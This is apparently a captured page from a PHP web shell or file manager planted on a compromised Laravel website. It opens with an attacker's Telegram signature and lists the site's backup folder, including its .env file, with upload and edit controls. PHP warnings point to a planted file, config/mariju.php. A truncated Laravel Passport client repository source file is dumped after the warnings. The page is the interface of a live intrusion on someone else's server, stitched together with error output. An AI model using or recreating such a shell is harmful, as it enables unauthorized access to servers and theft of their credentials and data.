telegram : @iamdarkcomedy i am hacker

path :/home/bisorgosof24/public_html/Backup23122024

upload file:

List of files:

name file size edit permission action
.env2733 KBDecember 22 2024 06:20:070644
404.html58370 KBNovember 20 2024 15:32:220644
502.html58368 KBNovember 20 2024 15:32:220644
Modules-December 11 2024 21:02:560755
README.md4158 KBFebruary 14 2023 12:31:560644
app-December 11 2024 17:57:480755
artisan1686 KBFebruary 14 2023 12:31:560644
bootstrap-December 11 2024 20:23:360755
composer.json3761 KBDecember 11 2024 22:15:000644
composer.lock512048 KBDecember 11 2024 22:13:280644
config-June 15 2025 02:09:360755
database-December 05 2024 20:18:120755
dfsdf dfds fd fds findex.html1420 KBNovember 20 2024 15:32:240644
error_log17214671 KBJuly 18 2025 18:53:220644
firoz-December 23 2024 13:24:460755
index.php1667 KBDecember 14 2024 05:20:360644
lang-December 11 2024 21:02:480755
modules_statuses.json472 KBNovember 20 2024 15:32:240644
mpos-March 31 2025 02:36:310755
package.json226 KBFebruary 14 2023 12:31:560644
phpunit.xml1146 KBFebruary 14 2023 12:31:560644
public-March 31 2025 02:36:310755
resources-December 11 2024 21:10:220755
routes-June 15 2025 02:09:310755
storage-December 11 2024 21:12:440755
tests-December 05 2024 20:18:120755
vendor-December 11 2024 22:13:300755
vite.config.js263 KBFebruary 14 2023 12:31:560644

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 227

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 228

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 229

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 230
personalAccessClientId = $personalAccessClientId; $this->personalAccessClientSecret = $personalAccessClientSecret; } /** * Get a client by the given ID. * * @param int|string $id * @return \Laravel\Passport\Client|null */ public function find($id) { $client = Passport::client(); return $client->where($client->getKeyName(), $id)->first(); } /** * Get an active client by the given ID. * * @param int|string $id * @return \Laravel\Passport\Client|null */ public function findActive($id) { $client = $this->find($id); return $client && ! $client->revoked ? $client : null; } /** * Get a client instance for the given ID and user ID. * * @param int|string $clientId * @param mixed $userId * @return \Laravel\Passport\Client|null */ public function findForUser($clientId, $userId) { $client = Passport::client(); return $client ->where($client->getKeyName(), $clientId) ->where('user_id', $userId) ->first(); } /** * Get the client instances for the given user ID. * * @param mixed $userId * @return \Illuminate\Database\Eloquent\Collection */ public function forUser($userId) { return Passport::client() ->where('user_id', $userId) ->orderBy('name', 'asc')->get(); } /** * Get the active client instances for the given user ID. * * @param mixed $userId * @return \Illuminate\Database\Eloquent\Collection */ public function activeForUser($userId) { return $this->forUser($userId)->reject(function ($client) { return $client->revoked; })->values(); } /** * Get the personal access token client for the application. * * @return \Laravel\Passport\Client * * @throws \RuntimeException */ public function personalAccessClient() { if ($this->personalAccessClientId) { return $this->find($this->personalAccessClientId); } $client = Passport::personalAccessClient(); if (! $client->exists()) { throw new RuntimeException('Personal access client not found. Please create one.'); } return $client->orderBy($client->getKeyName(), 'desc')->first()->client; } /** * Store a new client. * * @param int|null $userId * @param string $name * @param string $redirect * @param string|null $provider * @param bool $personalAccess * @param bool $password * @param bool $confidential * @return \Laravel\Passport\Client */ public function create($userId, $name, $redirect, $provider = null, $personalAccess = false, $password = false, $confidential = true) { $client = Passport::client()->forceFill([ 'user_id' => $userId, 'name' => $name, 'secret' => ($confidential || $personalAccess) ? Str::random(40) : null, 'provider' => $provider, 'redirect' => $redirect, 'personal_access_client' => $personalAccess, 'password_client' => $password, 'revoked' => false, ]); $client->save(); return $client; } /** * Store a new personal access token client. * * @param int|null $userId * @param string $name * @param string $redirect * @return \Laravel\Passport\Client */ public function createPersonalAccessClient($userId, $name, $redirect) { return tap($this->create($userId, $name, $redirect, null, true), function ($client) { $accessClient = Passport::personalAccessClient(); $accessClient->client_id = $client->getKey(); $accessClient->save(); }); } /** * Store a new password grant client. * * @param int|null $userId * @param string $name * @param string $redirect * @param string|null $provider * @return \Laravel\Passport\Client */ public function createPasswordGrantClient($userId, $name, $redirect, $provider = null) { return $this->create($userId, $name, $redirect, $provider, false, true); } /** * Update the given client. * * @param \Laravel\Passport\Client $client * @param string $name * @param string $redirect * @return \Laravel\Passport\Client */ public function update(Client $client, $name, $redirect) { $client->forceFill([ 'name' => $name, 'redirect' => $redirect, ])->save(); return $client; } /** * Regenerate the client secret. * * @param \Laravel\Passport\Client $client * @return \Laravel\Passport\Client */ public function regenerateSecret(Client $client) { $client->forceFill([ 'secret' => Str::random(40), ])->save(); return $client; } /** * Determine if the given client is revoked. * * @param int|string $id * @return bool */ public function revoked($id) { $client = $this->find($id); return is_null($client) || $client->revoked; } /** * Delete the given client. * * @param \Laravel\Passport\Client $client * @return void */ public function delete(Client $client) { $client->tokens()->update(['revoked' => true]); $client->forceFill(['revoked' => true])->save(); } /** * Get the personal access client id. * * @return int|string|null */ public function getPersonalAccessClientId() { return $this->personalAccessClientId; } /** * Get the personal access client secret. * * @return string|null */ public function getPersonalAccessClientSecret() { return $this->personalAccessClientSecret; } }